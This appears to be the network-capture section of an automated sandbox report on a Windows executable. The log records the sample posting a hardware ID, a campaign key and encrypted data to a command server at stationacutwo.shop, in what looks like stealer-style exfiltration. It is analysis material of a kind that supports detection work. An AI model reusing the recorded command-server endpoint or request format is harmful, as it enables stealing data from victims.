2024-07-02 17:02:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	188.114.97.3	443	3696	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 17:02:01 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: stationacutwo.shop
2024-07-02 17:02:01 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--key&j=
2024-07-02 17:02:02 UTC	798	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 17:02:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fsqp8jcjlc07gtsvngghf3okaq; expires=Sat, 26-Oct-2024 10:48:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGNXg1mD8lbznF%2FpDAITDCjHz6qWikDiKFRAB6h4LNwgZ4jXJBjYXuyPddh82RZoucSPXrEymQnSkWtMJiBOy3aQzR9s1r0ESpYg8VrVE1Fy1itFawFoKIiioYCSI6xwBCFJG9A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d0337d1e968c05-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 17:02:02 UTC	571	IN	Data Raw: 35 30 65 30 0d 0a 56 66 37 68 6a 32 65 5a 74 56 55 7a 6a 54 4c 63 2f 74 4e 33 65 4a 66 57 76 66 61 6b 6e 4b 7a 58 35 70 70 59 72 6d 74 73 4a 58 6b 75 39 4f 69 74 45 62 75 50 64 51 65 68 4f 4e 58 63 6f 42 4a 61 72 66 62 4a 68 4e 48 35 67 4e 33 76 75 44 6e 4b 53 56 59 46 48 7a 53 53 6b 75 70 4c 6b 37 78 33 56 76 55 51 35 74 36 49 66 58 47 65 72 5a 33 55 77 66 4b 4f 37 63 61 34 50 63 51 4a 44 55 6b 62 4e 4a 57 4f 2f 77 76 36 33 54 6c 55 35 56 65 2f 6d 72 49 62 46 66 4b 7a 32 4a 66 4f 38 73 57 36 6a 76 64 36 67 6b 74 4f 51 41 4e 33 78 4d 47 74 4b 76 7a 42 4e 48 37 73 51 62 66 63 38 77 70 55 6e 64 2b 30 6a 59 53 2b 79 62 6e 45 6f 48 69 4d 43 67 6c 48 46 54 4f 61 69 75 63 50 38 64 45 32 56 2b 64 43 74 5a 69 37 48 78 72 7a 76 39 4b 63 31 50 44 4b 76 59 6a 35 4e Data Ascii: 50e0Vf7hj2eZtVUzjTLc/tN3eJfWvfaknKzX5ppYrmtsJXku9OitEbuPdQehONXcoBJarfbJhNH5gN3vuDnKSVYFHzSSkupLk7x3VvUQ5t6IfXGerZ3UwfKO7ca4PcQJDUkbNJWO/wv63TlU5Ve/mrIbFfKz2JfO8sW6jvd6gktOQAN3xMGtKvzBNH7sQbfc8wpUnd+0jYS+ybnEoHiMCglHFTOaiucP8dE2V+dCtZi7Hxrzv9Kc1PDKvYj5N
2024-07-02 17:02:02 UTC	1369	IN	Data Raw: 31 2f 68 56 4c 4b 61 76 78 67 56 38 37 37 66 6b 38 7a 32 78 72 53 4a 38 7a 58 4d 44 41 4e 44 48 54 75 64 68 71 31 4c 75 5a 63 77 53 61 38 49 2f 4e 79 66 45 68 6e 6e 39 75 71 58 79 50 44 4a 6f 38 53 36 4a 59 4a 68 5a 53 77 43 64 64 79 45 34 55 57 6a 6c 58 64 66 36 6c 2b 73 6e 61 4d 51 46 4f 65 34 32 70 4c 4c 2f 63 43 31 67 66 38 33 77 67 38 4a 52 42 4d 7a 6e 59 33 68 44 2f 6a 54 4e 42 47 68 45 76 36 62 71 56 56 43 74 2f 54 75 6c 38 4c 35 33 4c 61 4b 75 48 6a 54 52 32 59 73 63 43 37 65 77 2b 6f 4a 75 34 39 31 45 65 56 57 73 35 57 36 45 68 4c 35 70 74 53 62 78 66 66 4a 73 34 37 37 4d 73 59 50 41 45 59 63 4d 70 75 52 34 77 37 32 31 44 31 58 72 78 37 38 33 4c 59 4e 57 71 33 32 6e 37 72 46 37 39 69 48 68 2b 6b 72 6a 45 73 52 43 58 4e 63 39 35 71 76 52 66 7a 62 Data Ascii: 1/hVLKavxgV877fk8z2xrSJ8zXMDANDHTudhq1LuZcwSa8I/NyfEhnn9uqXyPDJo8S6JYJhZSwCddyE4UWjlXdf6l+snaMQFOe42pLL/cC1gf83wg8JRBMznY3hD/jTNBGhEv6bqVVCt/Tul8L53LaKuHjTR2YscC7ew+oJu491EeVWs5W6EhL5ptSbxffJs477MsYPAEYcMpuR4w721D1Xrx783LYNWq32n7rF79iHh+krjEsRCXNc95qvRfzb
2024-07-02 17:02:02 UTC	1369	IN	Data Raw: 2f 77 39 4e 70 2b 41 37 66 30 32 4a 69 47 70 6f 7a 31 69 50 45 36 78 77 4d 4b 52 78 77 36 6d 59 44 71 42 76 62 51 50 56 2f 6f 56 4c 4b 56 76 42 4d 61 38 72 44 61 68 73 50 33 77 72 6e 45 74 6e 69 4d 44 68 59 48 51 33 58 63 72 4f 6f 54 2b 50 67 30 51 4f 59 51 2f 49 50 2f 66 58 47 65 72 5a 33 55 77 66 4b 4f 37 63 61 34 50 63 6b 42 42 55 45 54 4e 34 36 47 34 77 37 36 33 54 46 51 34 6c 79 34 6e 4c 41 56 48 50 6d 30 32 4a 50 55 37 4d 75 7a 6c 76 4a 36 67 6b 74 4f 51 41 4e 33 78 4d 47 74 4d 2b 76 41 4a 6b 65 74 5a 62 32 53 76 78 49 4d 74 66 62 41 32 71 36 56 70 61 7a 47 75 44 33 41 53 56 59 46 57 7a 79 63 6a 2b 6f 4e 2f 64 4d 2f 58 75 42 5a 72 4a 32 39 47 77 6a 79 74 4e 61 61 79 66 4c 48 75 49 50 31 4d 63 59 45 43 6b 41 61 64 39 4c 42 72 51 4c 6a 6c 32 38 54 72 Data Ascii: /w9Np+A7f02JiGpoz1iPE6xwMKRxw6mYDqBvbQPV/oVLKVvBMa8rDahsP3wrnEtniMDhYHQ3XcrOoT+Pg0QOYQ/IP/fXGerZ3UwfKO7ca4PckBBUETN46G4w763TFQ4ly4nLAVHPm02JPU7MuzlvJ6gktOQAN3xMGtM+vAJketZb2SvxIMtfbA2q6VpazGuD3ASVYFWzycj+oN/dM/XuBZrJ29GwjytNaayfLHuIP1McYECkAad9LBrQLjl28Tr
2024-07-02 17:02:02 UTC	1369	IN	Data Raw: 33 48 68 33 79 73 74 4b 63 79 2f 76 4e 74 49 44 79 4b 4d 38 43 42 45 6f 52 64 39 4c 42 72 51 4c 6a 6c 32 38 54 72 33 65 79 74 61 45 4f 43 4f 50 30 6e 59 75 49 6c 71 58 65 6e 62 70 36 79 77 56 4f 48 31 6c 33 6e 34 7a 6b 43 76 50 66 4f 46 37 72 58 72 69 61 76 42 41 56 2f 36 62 58 6d 73 76 31 77 62 36 57 2b 44 66 49 42 51 70 50 45 44 33 63 7a 61 39 46 2f 4d 39 33 43 61 30 51 69 35 47 2b 46 52 6e 6a 39 4a 32 4c 69 4a 61 6c 33 70 32 36 65 73 73 46 54 68 39 5a 64 35 43 4e 37 51 72 33 32 7a 78 5a 37 6c 79 77 6d 37 51 63 45 76 32 6d 33 70 44 4f 2f 38 43 36 68 66 77 2f 79 51 30 4a 51 78 30 34 33 4d 32 76 52 66 7a 50 64 77 6d 74 45 4a 47 37 68 46 63 37 7a 2f 53 64 69 34 69 57 70 64 36 64 75 6e 72 4c 42 55 34 66 57 58 65 51 67 4f 45 4e 39 4e 45 2b 58 65 56 5a 74 5a Data Ascii: 3Hh3ystKcy/vNtIDyKM8CBEoRd9LBrQLjl28Tr3eytaEOCOP0nYuIlqXenbp6ywVOH1l3n4zkCvPfOF7rXriavBAV/6bXmsv1wb6W+DfIBQpPED3cza9F/M93Ca0Qi5G+FRnj9J2LiJal3p26essFTh9Zd5CN7Qr32zxZ7lywm7QcEv2m3pDO/8C6hfw/yQ0JQx043M2vRfzPdwmtEJG7hFc7z/Sdi4iWpd6dunrLBU4fWXeQgOEN9NE+XeVZtZ
2024-07-02 17:02:02 UTC	1369	IN	Data Raw: 38 4c 4c 65 6c 4d 72 30 79 62 32 4f 39 6a 66 4b 44 51 68 42 57 33 6e 65 77 2b 6f 64 75 34 39 31 45 64 31 64 73 4a 57 79 45 78 66 6a 6e 4f 37 55 68 4f 47 41 33 65 2b 54 49 34 35 4a 43 55 74 62 62 39 37 44 36 51 37 7a 32 7a 4a 5a 36 6c 47 32 6c 72 6b 61 46 65 65 31 30 4a 33 42 39 63 4f 36 69 76 30 30 33 67 34 46 54 42 4d 2b 6b 6f 57 74 53 37 6d 58 4d 45 6d 76 43 50 7a 63 68 78 59 55 2f 71 58 51 6c 38 71 2b 6a 4b 72 4b 6b 46 47 6e 45 45 77 48 48 44 76 63 32 36 39 46 38 64 77 7a 55 75 74 56 73 5a 32 77 45 77 6a 79 76 63 32 61 79 2f 48 47 76 59 33 35 50 73 6b 45 43 45 73 52 4e 70 75 4e 34 77 32 37 6d 58 55 52 36 45 6a 2b 78 50 4e 56 4f 2b 57 76 7a 59 4c 4c 33 38 4f 36 78 4c 6f 6c 67 6d 46 6c 4c 41 4a 31 33 49 54 68 52 61 4f 56 64 31 6a 39 56 4c 4f 4f 75 42 49 Data Ascii: 8LLelMr0yb2O9jfKDQhBW3new+odu491Ed1dsJWyExfjnO7UhOGA3e+TI45JCUtbb97D6Q7z2zJZ6lG2lrkaFee10J3B9cO6iv003g4FTBM+koWtS7mXMEmvCPzchxYU/qXQl8q+jKrKkFGnEEwHHDvc269F8dwzUutVsZ2wEwjyvc2ay/HGvY35PskECEsRNpuN4w27mXUR6Ej+xPNVO+WvzYLL38O6xLolgmFlLAJ13IThRaOVd1j9VLOOuBI
2024-07-02 17:02:02 UTC	1369	IN	Data Raw: 5a 6a 4f 2b 74 79 31 6a 2f 45 31 7a 51 59 4f 52 42 6f 39 6c 4a 48 72 42 66 44 66 4d 46 6e 72 58 71 79 64 76 6c 56 55 74 2f 54 59 6a 49 61 6d 6a 50 57 31 37 6a 33 4c 42 6b 78 75 48 43 79 64 69 65 34 4f 39 35 64 31 54 71 45 34 31 66 65 6f 56 31 72 79 75 4a 2f 4d 68 4c 37 44 75 59 6e 38 4b 4d 41 4a 44 6b 34 63 50 59 36 4d 34 67 6a 34 31 7a 4a 44 37 6b 4b 78 6c 37 51 57 48 76 71 37 30 35 7a 4d 76 6f 44 33 78 50 38 69 6a 46 46 4d 42 7a 63 30 6a 59 6d 76 49 75 48 42 4d 46 33 2b 57 37 4f 51 38 56 63 46 75 39 79 30 2f 39 2b 38 6a 72 4b 49 75 47 4b 4f 53 51 35 47 46 69 57 5a 67 75 63 50 39 74 38 34 56 4f 70 66 75 70 69 36 47 77 6a 37 75 39 2b 53 7a 66 2f 4c 74 6f 2f 79 4e 4d 55 62 54 67 6c 5a 64 35 75 62 72 56 32 35 6c 78 31 4b 37 6c 32 79 33 70 38 65 44 50 4c 32 Data Ascii: ZjO+ty1j/E1zQYORBo9lJHrBfDfMFnrXqydvlVUt/TYjIamjPW17j3LBkxuHCydie4O95d1TqE41feoV1ryuJ/MhL7DuYn8KMAJDk4cPY6M4gj41zJD7kKxl7QWHvq705zMvoD3xP8ijFFMBzc0jYmvIuHBMF3+W7OQ8VcFu9y0/9+8jrKIuGKOSQ5GFiWZgucP9t84VOpfupi6Gwj7u9+Szf/Lto/yNMUbTglZd5ubrV25lx1K7l2y3p8eDPL2
2024-07-02 17:02:02 UTC	1369	IN	Data Raw: 37 41 74 59 58 31 4f 6f 78 48 54 41 63 63 4c 39 7a 62 72 30 58 65 39 43 42 48 35 52 4b 64 69 36 63 66 48 66 6d 69 31 4a 58 46 36 4d 4f 6c 78 4c 6f 6c 67 6d 46 6c 4c 41 4a 31 33 49 54 68 52 61 4f 56 64 31 72 67 58 72 4f 58 74 52 77 66 2f 62 66 61 6b 63 7a 79 77 72 53 4d 38 54 44 4a 44 41 68 4e 47 44 6d 54 67 75 45 42 38 74 6b 2b 45 61 45 53 2f 70 75 70 56 55 4b 33 39 4f 6d 45 77 65 62 44 70 63 62 4b 4f 64 30 59 47 30 6f 4c 4d 64 36 73 37 67 6e 34 30 6a 42 42 72 78 4b 68 30 74 6c 2b 63 65 7a 32 6e 35 50 4b 76 70 62 33 78 50 67 2b 77 41 6f 4a 53 52 51 36 6b 34 54 6d 43 76 48 5a 4a 56 37 71 57 4c 4b 55 76 41 63 51 2f 36 62 57 6e 63 76 77 78 71 65 48 75 48 53 4f 53 51 6c 66 57 32 2f 65 77 39 38 50 2b 4e 73 68 58 4f 41 51 2f 49 50 2f 66 58 47 65 72 5a 33 55 77 Data Ascii: 7AtYX1OoxHTAccL9zbr0Xe9CBH5RKdi6cfHfmi1JXF6MOlxLolgmFlLAJ13IThRaOVd1rgXrOXtRwf/bfakczywrSM8TDJDAhNGDmTguEB8tk+EaES/pupVUK39OmEwebDpcbKOd0YG0oLMd6s7gn40jBBrxKh0tl+cez2n5PKvpb3xPg+wAoJSRQ6k4TmCvHZJV7qWLKUvAcQ/6bWncvwxqeHuHSOSQlfW2/ew98P+NshXOAQ/IP/fXGerZ3Uw
2024-07-02 17:02:02 UTC	1369	IN	Data Raw: 4c 38 33 71 43 59 57 55 73 63 48 65 61 77 37 56 48 71 35 6c 66 4f 6f 51 37 2f 70 69 67 56 55 4b 33 35 49 33 50 6b 36 32 5a 35 64 61 51 55 61 63 57 51 43 39 77 58 49 58 72 68 6d 36 51 6c 79 45 52 74 78 4c 73 30 74 6c 2b 63 5a 37 30 7a 64 53 65 76 49 37 79 68 2b 6f 6f 79 67 6f 59 52 46 77 4a 6f 71 44 36 45 2f 48 4d 64 58 66 6f 51 62 65 4b 76 41 63 6b 79 35 72 53 6c 63 58 77 6a 49 53 53 39 53 72 50 44 41 6c 35 4a 54 6d 62 6c 2b 6f 4c 2f 64 64 33 48 34 63 37 31 66 66 78 47 6c 71 74 39 75 62 55 6a 72 37 78 2b 2b 79 54 55 61 64 4a 46 67 64 44 64 64 79 32 37 67 76 31 30 43 46 41 6f 6e 4f 70 69 72 73 4f 57 4e 4f 7a 7a 70 33 51 38 39 7a 31 79 70 42 52 70 32 4a 4f 51 56 74 76 33 74 4f 6a 62 5a 43 38 58 42 48 72 51 66 37 45 38 30 56 49 72 75 47 4d 77 35 61 73 70 74 Data Ascii: L83qCYWUscHeaw7VHq5lfOoQ7/pigVUK35I3Pk62Z5daQUacWQC9wXIXrhm6QlyERtxLs0tl+cZ70zdSevI7yh+ooygoYRFwJoqD6E/HMdXfoQbeKvAcky5rSlcXwjISS9SrPDAl5JTmbl+oL/dd3H4c71ffxGlqt9ubUjr7x++yTUadJFgdDddy27gv10CFAonOpirsOWNOzzp3Q89z1ypBRp2JOQVtv3tOjbZC8XBHrQf7E80VIruGMw5aspt
2024-07-02 17:02:02 UTC	1369	IN	Data Raw: 70 30 6b 57 42 30 4e 31 33 4c 62 75 43 2f 58 51 49 55 43 69 64 37 43 62 73 41 4d 4b 2b 4c 6a 2b 6c 39 66 30 6a 76 76 73 6b 31 47 6e 53 51 67 48 51 33 58 4f 7a 59 56 75 6b 4c 78 33 56 66 34 51 35 74 37 68 52 30 47 67 35 34 6a 45 6c 4a 61 6c 33 70 75 32 55 71 64 69 46 79 39 77 58 50 66 44 2b 30 57 6a 6c 57 55 66 68 7a 76 56 39 2f 45 48 57 71 33 32 6e 39 50 46 37 4e 79 7a 68 2b 34 35 69 7a 63 77 59 67 77 30 6a 49 58 75 4f 38 58 38 4f 31 66 6f 53 72 6d 61 6c 7a 56 61 75 39 79 30 2f 36 32 2b 77 66 58 63 75 67 4f 4d 51 55 35 34 56 56 2f 33 36 49 5a 46 34 35 64 76 45 36 39 6c 76 5a 4b 2f 45 67 7a 6b 2b 66 71 44 78 65 37 49 74 73 53 32 55 71 64 69 5a 51 63 64 64 38 54 42 76 55 75 54 76 46 77 36 72 31 53 76 33 4f 6c 58 53 71 66 76 69 73 65 52 72 70 7a 64 37 35 4d Data Ascii: p0kWB0N13LbuC/XQIUCid7CbsAMK+Lj+l9f0jvvsk1GnSQgHQ3XOzYVukLx3Vf4Q5t7hR0Gg54jElJal3pu2UqdiFy9wXPfD+0WjlWUfhzvV9/EHWq32n9PF7Nyzh+45izcwYgw0jIXuO8X8O1foSrmalzVau9y0/62+wfXcugOMQU54VV/36IZF45dvE69lvZK/Egzk+fqDxe7ItsS2UqdiZQcdd8TBvUuTvFw6r1Sv3OlXSqfviseRrpzd75M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	188.114.97.3	443	3696	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 17:02:03 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18161 Host: stationacutwo.shop
2024-07-02 17:02:03 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 37 39 46 30 35 39 31 38 36 34 45 41 31 30 46 35 32 37 32 30 36 33 42 43 39 41 34 43 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5879F0591864EA10F5272063BC9A4CC2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 17:02:03 UTC	2830	OUT	Data Raw: 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f Data Ascii: 2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?
2024-07-02 17:02:03 UTC	798	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 17:02:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5f3ooktdif27glmo6lvlj2gv98; expires=Sat, 26-Oct-2024 10:48:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUWU%2FxNLIz3PCzTkSs9ut7iu7Kd2VaRTuMa60BKL00qt5LxqtzOwqMbkHgsYWvxVt9DvUaktMyPgKHdQGRt2MOkmMIFir3zM7LkUgMro4SK3UZbFn8mrDjyiLAaAsazBXlX1frg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d03387b8877ce8-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 17:02:03 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 17:02:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	188.114.97.3	443	3696	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 17:02:04 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8782 Host: stationacutwo.shop
2024-07-02 17:02:04 UTC	8782	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 37 39 46 30 35 39 31 38 36 34 45 41 31 30 46 35 32 37 32 30 36 33 42 43 39 41 34 43 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5879F0591864EA10F5272063BC9A4CC2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 17:02:04 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 17:02:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cn12hobhov1k5b5kf23sr1fd4p; expires=Sat, 26-Oct-2024 10:48:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4e1KkxxkSv6SaT7GSDmfkuAoYtsCPRMm9U3KYSZl21lC%2FIS16IHsLsoY6pNNYhCxXrkJVoxcUfu%2BR7FC0edBHLKZCCtVwiSHU60k7%2By0vBbptf4h%2BiNRQ1Upn651NkxH%2BKmNOV8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d0338ea92e0ca1-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 17:02:04 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 17:02:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	188.114.97.3	443	3696	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 17:02:05 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20435 Host: stationacutwo.shop
2024-07-02 17:02:05 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 37 39 46 30 35 39 31 38 36 34 45 41 31 30 46 35 32 37 32 30 36 33 42 43 39 41 34 43 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5879F0591864EA10F5272063BC9A4CC2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 17:02:05 UTC	5104	OUT	Data Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-07-02 17:02:06 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 17:02:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e1b4p0b6api2rdpc6i40077e8l; expires=Sat, 26-Oct-2024 10:48:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNuJ9Drq6bS2YCJ5C8w9uIVAiMRoZgjlOsyhrP65N9Bb5I1pgH8Oek6WEGE%2F5Cu0%2Bk7dN3G058hT2b%2BmWoIZlaMRMOuCvRwiIPBpsaXGL8L%2FA6bDS9nVF6owdfmNraFrP%2BbbgYY%3D"}],"group":"cf-nel","max_age":604800} NEL: 